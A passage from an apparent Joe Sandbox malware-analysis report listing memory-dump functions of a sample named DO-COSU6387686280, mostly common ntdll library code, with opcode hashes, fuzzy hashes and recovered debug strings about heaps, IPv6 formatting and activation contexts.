                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 956e05dbf65d155f1c881d8e0967aaa34f8894ee0247a2831f3b123a52c69477
                                                                                        • Instruction ID: b0019aa808a69d84193683cdb93ebea296a2effbdc60f413d1e5046a61d19b3c
                                                                                        • Opcode Fuzzy Hash: 956e05dbf65d155f1c881d8e0967aaa34f8894ee0247a2831f3b123a52c69477
                                                                                        • Instruction Fuzzy Hash: B290026121540042D2047158440870640C597E5201F55C022A2154564CC5298E615226
                                                                                        Function 017D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d0acf6ae19f6300c8d9652fadf9dd69a018e72bb4cd9c58332527edf3fb8e5c1
                                                                                        • Instruction ID: f864b18443a0edfed0e84c547d85f5b237481e0d9018cd1fbfda0afbd235b8f2
                                                                                        • Opcode Fuzzy Hash: d0acf6ae19f6300c8d9652fadf9dd69a018e72bb4cd9c58332527edf3fb8e5c1
                                                                                        • Instruction Fuzzy Hash: 9290026134540442D20071584418B064085D7E5301F55C025E1064564DC619CE526227
                                                                                        Function 017D2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d3356079e4a14460edc511dcf9f632559a9a65d89af16e7eeefd3e2e0f60375
                                                                                        • Instruction ID: 58f012e976998c8dc401e633cc13b58ca5e5ea7db668f129e6ee0fb6ef475ec2
                                                                                        • Opcode Fuzzy Hash: 4d3356079e4a14460edc511dcf9f632559a9a65d89af16e7eeefd3e2e0f60375
                                                                                        • Instruction Fuzzy Hash: 65900221215C0042D30075684C18B07408597D4303F55C125A0154564CC9158A615622
                                                                                        Function 017D2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4945084bcc4f41c487c5b6446443d086aa23320b266fc29eada04b3e3068e623
                                                                                        • Instruction ID: 739c321732dba9012e38cf2b32d836beefd677f7107fb53e9495fd8a799830c0
                                                                                        • Opcode Fuzzy Hash: 4945084bcc4f41c487c5b6446443d086aa23320b266fc29eada04b3e3068e623
                                                                                        • Instruction Fuzzy Hash: C1900221605400424240716888489068085BBE5211755C131A0998560DC5598A655766
                                                                                        Function 017D2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22938d3d07b3828721598c48aa11e0754bc495d194196f119b4d1a5cdebb879c
                                                                                        • Instruction ID: 343541812192e3b4146c2e7e5f1de85ec9707f9f44b46f9cd4121fb31787d9ad
                                                                                        • Opcode Fuzzy Hash: 22938d3d07b3828721598c48aa11e0754bc495d194196f119b4d1a5cdebb879c
                                                                                        • Instruction Fuzzy Hash: 7290023120580402D2007158480C747408597D4302F55C021A5164565EC665CA916632
                                                                                        Function 017D2F90 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bd0cb0d7c6fd0af7488173df00ba22d6b771ca3a03c4bad68a6f283dc802329f
                                                                                        • Instruction ID: 93f132f1ce4e70174bd284c2947cc5210335972af77f8f9b62db66e2a1402c2a
                                                                                        • Opcode Fuzzy Hash: bd0cb0d7c6fd0af7488173df00ba22d6b771ca3a03c4bad68a6f283dc802329f
                                                                                        • Instruction Fuzzy Hash: 9E90023120580402D2007158481870B408597D4302F55C021A1164565DC6258A516672
                                                                                        Function 017D2E30 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3f4bbe34671e40cdc1efdd61437a1ee49bb841d2676d3a1db92fb44777455052
                                                                                        • Instruction ID: 0b7cbeee2b5db61d00aa6656d752b2e56a7a8e864423670ac20e5fee51d1a5fa
                                                                                        • Opcode Fuzzy Hash: 3f4bbe34671e40cdc1efdd61437a1ee49bb841d2676d3a1db92fb44777455052
                                                                                        • Instruction Fuzzy Hash: 8090022130540402D202715844186064089D7D5345F95C022E1424565DC6258B53A233
                                                                                        Function 017D2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b57c990063abb18b29a0431b86ad0565c2b0824341bf6370c4b96f418285c45a
                                                                                        • Instruction ID: cde3ee72c594a87bf053214cfda9430af3ad2c17828c20473fc34f394f4bf3df
                                                                                        • Opcode Fuzzy Hash: b57c990063abb18b29a0431b86ad0565c2b0824341bf6370c4b96f418285c45a
                                                                                        • Instruction Fuzzy Hash: 2790026120580403D24075584808607408597D4302F55C021A2064565ECA298E516236
                                                                                        Function 017D2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74efe18c7d628f6087b605f9fde27375ab2b9aaefa9afab72100e28ac1d2eaab
                                                                                        • Instruction ID: 8e52d4c3d4591f67d372dfe375267172aee8a9e01e83b6a780052256bd387eb9
                                                                                        • Opcode Fuzzy Hash: 74efe18c7d628f6087b605f9fde27375ab2b9aaefa9afab72100e28ac1d2eaab
                                                                                        • Instruction Fuzzy Hash: D890027120540402D24071584408746408597D4301F55C021A5064564EC6598FD56766
                                                                                        Function 017D2E80 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 979ca67777c7ddba210517ea99413d33f596dd1518202b4ef7ef77cab9909ab7
                                                                                        • Instruction ID: 10f16ebddbe684807e213f68d65b796ff0621cbb5c77b969d84c9cc2149e571e
                                                                                        • Opcode Fuzzy Hash: 979ca67777c7ddba210517ea99413d33f596dd1518202b4ef7ef77cab9909ab7
                                                                                        • Instruction Fuzzy Hash: 3790022160540502D20171584408616408A97D4241F95C032A1024565ECA258B92A232
                                                                                        Function 017D3010 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                                                                        • Instruction ID: 1708fb0e4da644f26a5beac273baa399eaa7b372b4c3d3e4ae261d7d88d3a4d3
                                                                                        • Opcode Fuzzy Hash: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                                                                        • Instruction Fuzzy Hash: 5390022120584442D24072584808B0F818597E5202F95C029A4156564CC9158A555722
                                                                                        Function 017D3090 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                        • Instruction ID: 7b198bd8e7b458dfc82464159d4177059c9417511057ac3f881cc995840d23bb
                                                                                        • Opcode Fuzzy Hash: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                        • Instruction Fuzzy Hash: D390022124540802D240715884187074086D7D4601F55C021A0024564DC6168B6567B2
                                                                                        Function 017D39B0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                        • Instruction ID: bf70bc150b8b0e5a58672f0da946d4d94266f4c88b94360583737b231a3d456d
                                                                                        • Opcode Fuzzy Hash: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                        • Instruction Fuzzy Hash: 2290022124945102D250715C44086168085B7E4201F55C031A08145A4DC5558A556322
                                                                                        Function 017D3D70 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                        • Instruction ID: 009cc0530e7b1b6bdb5bca36348f692083311b3074fa65884ccdd8187048ac25
                                                                                        • Opcode Fuzzy Hash: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                        • Instruction Fuzzy Hash: 2D90023520540402D6107158580864640C697D4301F55D421A0424568DC6548AA1A222
                                                                                        Function 017D3D10 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                        • Instruction ID: 5e56b9b4fa441f21852923bb7dbad198a659d6b815cd7cbd22da94c25f33fcd2
                                                                                        • Opcode Fuzzy Hash: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                        • Instruction Fuzzy Hash: 6190023120640142964072585808A4E818597E5302B95D425A0015564CC9148A615322
                                                                                        Function 017D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: ad845efdc78c852db2baae793369cbdd99d8e48f166cbc3396e1b2cd4a36796c
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Function 017D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                        • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                                                                        • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                        • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                                                                        Function 01842410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                        • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                                                                        • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                        • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                                                                        Function 0186A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: HEAP:
                                                                                        • API String ID: 3446177414-2466845122
                                                                                        • Opcode ID: f9ae441567dbbd7f9a0b813da78b68a594c62e5edcc7e44cd3b1e67556ceb729
                                                                                        • Instruction ID: f129a30db8b252ba79e6c05018623621bbd2512da621b9b915a15aadf70fe784
                                                                                        • Opcode Fuzzy Hash: f9ae441567dbbd7f9a0b813da78b68a594c62e5edcc7e44cd3b1e67556ceb729
                                                                                        • Instruction Fuzzy Hash: 25A1AE75A043118FD719CE1CC894A2ABBE9FF88714F19456DEA46EB311E734EE02CB91
                                                                                        Function 017C7630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                                                                        • ExecuteOptions, xrefs: 018046A0
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                                                                        • Execute=1, xrefs: 01804713
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                        • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                                                                        • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                        • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                                                                        Function 017AA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SsHd, xrefs: 017AA3E4
                                                                                        • Actx , xrefs: 017F7A0C, 017F7A73
                                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 017F79D0, 017F79F5
                                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F79FA
                                                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 017F7AE6
                                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F79D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                        • API String ID: 0-1988757188
                                                                                        • Opcode ID: 3391e532a89dc22a65e288730fe08ace80d2501da8ea7274b38760f7e1d421d0
                                                                                        • Instruction ID: 5c82083c44634a11dbc18f1fe3cab46c2607fd9dbab82ea1eccd3634d84f4fa8
                                                                                        • Opcode Fuzzy Hash: 3391e532a89dc22a65e288730fe08ace80d2501da8ea7274b38760f7e1d421d0
                                                                                        • Instruction Fuzzy Hash: AFE1B0706083028FE729CE2CC894B2BFBE1ABC4354F554B6DFAA58B291D731D945CB52
                                                                                        Function 017AD770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • Actx , xrefs: 017F9508
